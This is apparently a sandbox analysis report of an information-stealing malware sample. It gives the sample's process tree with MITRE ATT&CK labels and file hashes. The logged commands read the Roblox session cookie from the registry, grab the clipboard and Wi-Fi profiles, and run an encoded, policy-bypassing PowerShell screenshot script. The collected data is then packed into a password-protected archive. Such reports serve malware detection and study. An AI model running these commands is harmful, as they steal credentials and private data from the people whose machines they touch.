- Command and Scripting Interpreter: PowerShell
PID:3052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2212
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2160
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:4548
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2904
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3640
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1372 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3060
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:780
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:5464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵PID:5540
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\drgmrubq\drgmrubq.cmdline"5⤵PID:6124
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES940D.tmp" "c:\Users\Admin\AppData\Local\Temp\drgmrubq\CSCDA18A4C11B5444D5B98FEDDDAA688C20.TMP"6⤵PID:2408
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:5580
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Views/modifies file attributes
PID:5788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5620
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5816
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:5852
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Views/modifies file attributes
PID:5932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5960
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5988
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6136
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3044
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3976
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41362\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\aHkRb.zip" *"3⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\_MEI41362\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI41362\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\aHkRb.zip" *4⤵PID:5908
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
4System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
1KB
MD554773bba29b336ab67f79c3814342073
SHA15596d2b645455ce898a507d240a85ba134924a6e
SHA256e5b8248b7da2f360f2f09922e773713849997337803d08f4276f37894ab93b1b
SHA512736e3cc6a14fb0451bd65d2be0ffd1e567016ac47478e2c2f12ae5b91d19cb6f74eff0274bf8dea5eff67a9786a14c01d2b43587e2bd76d92fe0b59265cd6eda
-
Filesize
1KB
MD5d9b023aba025ea7da423b289925e657b
SHA1bbc92618b431ec1a52a0db3e42aafa91c056a208
SHA2561a8c94830603da734d2c9e5178c30b639120937b79138cc5e49b6dbfa8ce4337
SHA51224c2a91b77b216aff8afc2392fd647cb49567c0ac41c8f9610c9f94aeac8958490018f28bdc7174fcfd086862ab482ed4949c0e7f359239fdc18a13194feaf1d
-
Filesize
1KB
MD588fa50c4d0002bc58f8a4a71a91136aa
SHA121b1c1458f2ee5bc174972b1259cf93cab5ff4d9
SHA2561842271816ddc481474b5eb48000d5177e1d4099b46c4eafed38793c737e0bae
SHA5125b1bd4f3f7d2cab75ed748daf3b8882443fd986ac75d4c7c14735a0644cd6f2e6ffa4c29906b65b0d677a282601fec7613d8dcaf723bec5e503c233bc9613c15
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
112KB
MD5780853cddeaee8de70f28a4b255a600b
SHA1ad7a5da33f7ad12946153c497e990720b09005ed
SHA2561055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3
SHA512e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8
-
Filesize
114KB
MD570651641076e9ade93461e122f86ad40
SHA1f01736368144f023564b2058bfa611118fb0f733
SHA2563b6dd0614e1c0f2f72c6c188fb41d0e572f6601dfb19d10d939962ff90214be3
SHA5126f936cd6222ba1f4ab51f28af891754d711f6f74845e3cead1932b45f30aac71a846d8a990a358cca78bc700c2fbd5c61ad96944f7fb9744ca51a2883fc73638
-
Filesize
1KB
MD512a4614d74f07a0d6024bf08fe60a641
SHA19b4fb1d915a0a0d02f989a35c5342185d40b9eff
SHA2568b22c68561e537582bc9373671cbbc0c72ea3f98c63e0834061448059f49bd43
SHA512cb3f938a169282b6f9dec61461b4bfe93597290a8ce1ff8d16c57a6fdac0a6b5a8321199f112fa69a94d3f51d013157d41e1bfd2fe83d5ef2856ec10d60718e0
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
48KB
MD5554b7b0d0daca993e22b7d31ed498bc2
SHA1ea7f1823e782d08a99b437c665d86fa734fe3fe4
SHA2561db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f
SHA5124b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a
-
Filesize
58KB
MD5d603c8bfe4cfc71fe5134d64be2e929b
SHA1ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b
SHA2565ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe
SHA512fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361
-
Filesize
35KB
MD532df18692606ce984614c7efda2eec27
SHA186084e39ab0aadf0ecfb82ce066b7bf14152961e
SHA256b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065
SHA512679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d
-
Filesize
85KB
MD501629284f906c40f480e80104158f31a
SHA16ab85c66956856710f32aed6cdae64a60aea5f0f
SHA256a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812
SHA512107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4
-
Filesize
25KB
MD54a313dc23f9d0a1f328c74dd5cf3b9ab
SHA1494f1f5ead41d41d324c82721ab7ca1d1b72c062
SHA2562163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e
SHA51242c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e
-
Filesize
43KB
MD567897f8c3262aecb8c9f15292dd1e1f0
SHA174f1ef77dd3265846a504f98f2e2f080eadbf58a
SHA256ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7
SHA512200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba
-
Filesize
56KB
MD5230025cf18b0c20c5f4abba63d733ca8
SHA1336248fde1973410a0746599e14485d068771e30
SHA25630a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332
SHA5122c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1
-
Filesize
62KB
MD50d15b2fdfa03be76917723686e77823c
SHA1efd799a4a5e4f9d15226584dd2ee03956f37bdaf
SHA2562fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8
SHA512e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227
-
Filesize
1.7MB
MD5ebb4f1a115f0692698b5640869f30853
SHA19ba77340a6a32af08899e7f3c97841724dd78c3f
SHA2564ab0deb6a298d14a0f50d55dc6ce5673b6c5320817ec255acf282191642a4576
SHA5123f6ba7d86c9f292344f4ad196f4ae863bf936578dd7cfac7dc4aaf05c2c78e68d5f813c4ed36048b6678451f1717deeb77493d8557ee6778c6a70beb5294d21a
-
Filesize
122KB
MD59c8812f04bd0fb6a40c804d8ed33de71
SHA1726816e0b6715f0753789f222b873840e7aa144f
SHA256b9021cc0c1263018729e7d8c01df4846b80cb948e8a68f77376c1a36c5c210c5
SHA512547fbf3880d25212f3c489b5b4a26ade07c1f6aa299dff83d559f9476084c6e91b33404805b55f6fab4f06fe2b5913e1e9181d409ba2a2bdccaf729799a54643
-
Filesize
1.1MB
MD5bbc1fcb5792f226c82e3e958948cb3c3
SHA14d25857bcf0651d90725d4fb8db03ccada6540c3
SHA2569a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47
SHA5123137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
204KB
MD5ad0a2b4286a43a0ef05f452667e656db
SHA1a8835ca75768b5756aa2445ca33b16e18ceacb77
SHA2562af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1
SHA512cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4
-
Filesize
1.6MB
MD59e985651962ccbccdf5220f6617b444f
SHA19238853fe1cff8a49c2c801644d6aa57ed1fe4d2
SHA2563373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e
